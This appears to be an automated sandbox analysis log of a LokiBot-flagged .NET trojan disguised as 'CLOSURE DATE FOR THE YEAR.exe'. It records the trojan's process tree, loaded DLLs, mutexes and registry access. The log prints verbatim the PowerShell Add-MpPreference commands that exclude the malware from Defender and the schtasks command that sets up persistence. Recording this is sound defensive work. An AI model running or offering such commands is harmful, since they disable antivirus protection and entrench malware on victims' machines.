                Source: Process Memory Space: IOsbBBIDAm.exe PID: 8056, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: CLOSURE DATE FOR THE YEAR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: IOsbBBIDAm.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, tgq5K1s6GeBooaKkHr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, tgq5K1s6GeBooaKkHr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, jviyFnUkOEMiWAYfmN.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, jviyFnUkOEMiWAYfmN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, jviyFnUkOEMiWAYfmN.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, tgq5K1s6GeBooaKkHr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, jviyFnUkOEMiWAYfmN.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, jviyFnUkOEMiWAYfmN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, jviyFnUkOEMiWAYfmN.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, jviyFnUkOEMiWAYfmN.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, jviyFnUkOEMiWAYfmN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, jviyFnUkOEMiWAYfmN.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/20@0/1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,8_2_0040650A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,8_2_0040434D
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeFile created: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7272:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeMutant created: NULL
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeMutant created: \Sessions\1\BaseNamedObjects\vfbDDGhjAxhVXHPRpkmedSIljgH
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8056
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB774.tmpJump to behavior
                Source: CLOSURE DATE FOR THE YEAR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: CLOSURE DATE FOR THE YEAR.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: CLOSURE DATE FOR THE YEAR.exeReversingLabs: Detection: 39%
                Source: CLOSURE DATE FOR THE YEAR.exeVirustotal: Detection: 47%
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeFile read: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8056 -s 1768
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: CLOSURE DATE FOR THE YEAR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: CLOSURE DATE FOR THE YEAR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb%t& source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Accessibility.pdb source: WERA61F.tmp.dmp.16.dr
